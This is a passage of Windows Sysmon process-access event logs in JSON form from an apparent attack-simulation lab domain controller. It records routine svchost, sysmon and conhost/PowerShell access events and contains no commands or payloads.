05:52:44.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5246,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5247,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5248,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5249,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5250,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5251,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5252,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5253,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.656\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-0010BD160A00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.656","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-0010BD160A00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
